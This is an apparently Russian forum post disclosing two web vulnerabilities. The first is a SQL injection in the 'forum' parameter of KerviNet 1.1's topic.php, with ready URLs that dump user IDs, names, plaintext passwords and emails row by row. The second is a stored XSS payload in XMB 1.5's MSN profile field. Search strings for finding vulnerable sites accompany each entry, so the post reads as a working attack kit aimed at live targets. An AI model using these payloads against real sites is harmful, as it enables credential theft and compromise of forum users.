Форум: KerviNet
Версия: 1.1
Из-за отсутствия фильтрации параметров, есть возможность осуществить SQL инъекцию.
Сценарий
topic.php.
Уязвим параметр
forum.
------------
PHP код:
$mysql->query("SELECT name FROM forums WHERE id_forum = ".$forum);
Параметр передаёться, как есть, без какой либо фильтрации.
------------
Делаем запрос к базе данных:
topic.php?forum=-1+union+select+1/*
Таблица с пользователями:
topic.php?forum=-1+union+select+1+from+users/*
Вывод логина, пароля и мыла пользователя:
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users/*
В результате запроса получаем: 1:TEST:123:grey@site.ru
где
1 - номер пользователя,
TEST - имя пользователя,
123 - пароль пользователя, заметьте пароль храниться в незашифрованном виде,
grey@site.ru - мыло пользователя
char(58) - это символ '
:' который в нашем случае служит разделителем.
Перебор пользователей:
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+0,1/*
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+1,1/*
topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(5 8),pass,char(58),email)+from+users+limit+2,1/*
Код:
http://site.com/forum/topic.php?forum=-1+union+select+concat(id_user,char(58),name,char(58),pass,char(58),email)+from+users+limit+0,1/*
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Copyright KerviNet © 2005-2007
------------------------------------------------------------
------------------------------------------------------------
Форум: XMB
Версия: 1.5
Активная XSS
Уязвим параметр
MSN.
При регистрации пользователя в поле
MSN вводим
<script>alert();</script>, скрипт будет срабатывать при просмотре профиля пользователя.
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Powered by XMB